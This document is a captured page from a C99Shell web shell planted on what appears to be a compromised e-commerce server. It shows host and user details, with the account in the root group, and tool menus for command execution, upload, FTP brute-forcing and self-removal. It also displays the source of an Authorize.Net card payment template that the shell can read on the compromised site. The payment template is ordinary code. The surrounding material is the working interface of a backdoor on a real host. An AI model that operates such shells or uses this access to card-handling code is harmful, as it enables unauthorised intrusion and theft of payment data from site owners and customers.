!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/Modules/AuthorizeNet/Resources/views/   drwxr-xr-x
Free 26.31 GB of 117.98 GB (22.3%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     pay.blade.php (2.95 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('gateway::layouts.payment')

@section('logo', asset(config('authorizenet.logo')))

@section('gateway', config('authorizenet.name'))

@section('content')

    <p class="para-6">{{ __('Fill in the required information') }}</p>
    <div class="straight-line"></div>
    @include('gateway::partial.instruction')
    <form class="pay-form needs-validation"
        action="{{ route('gateway.complete', withOldQueryIntegrity(['gateway' => config('authorizenet.alias')])) }}" method="post"
        id="payment-form">
        @csrf
        <div>
            <div id="card-element">
                <!-- a Authorize net Element will be inserted here. -->

                <div class="mb-3">
                    <label for="cardNumber" class="form-label">{{ __('Credit or debit card') }}</label>
                    <input type="text" oninput="numberOnly(this.id);"  maxlength="17" minlength="13" class="form-control" name="cardNumber" pattern="\d*" id="cardNumber" placeholder="4111 1111 1111 1111" required>
                </div>

                <div class="d-flex justify-content-between">
                    <div>
                        <label for="staticEmail2" class="form-label">{{ __('Expiration Date') }}</label>
                        <div class="d-flex justify-items-start">
                            <select class="form-select" name="expiration_month" aria-label="Default select example">
                                @foreach (range(1, 12) as $month)
                                    <option value="{{ $month }}" {{ old('expiration-month') == $month ? 'selected' : '' }}>{{ DateTime::createFromFormat('!m', $month)->format('F') }}</option>
                                @endforeach
                            </select>
                            <select class="form-select" name="expiration_year" aria-label="Default select example">
                                @for($year = date('Y'); $year <= (date('Y') + 20); $year++)
                                    <option value="{{ $year }}">{{ $year }}</option>
                                @endfor
                            </select>
                        </div>
                    </div>
                    <div>
                        <label for="cvv" class="form-label">{{ __('CVV') }}</label>
                        <input type="text" oninput="numberOnly(this.id);" maxlength="4" minlength="3" name="cvv" class="form-control" pattern="\d*" id="cvv" placeholder="123" value="{{ old('cvv') }}" required>
                    </div>
                </div>
            </div>
            <!-- Used to display form errors -->
            <div id="card-errors"></div>
        </div>
        <button type="submit" class="pay-button sub-btn">{{ __('Pay With Authorize Net') }}</button>
    </form>
@endsection

@section('css')

@endsection

@section('js')
    <script src="{{ asset('Modules/AuthorizeNet/Resources/assets/js/authorizeNet.min.js') }}"></script>
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0065 ]--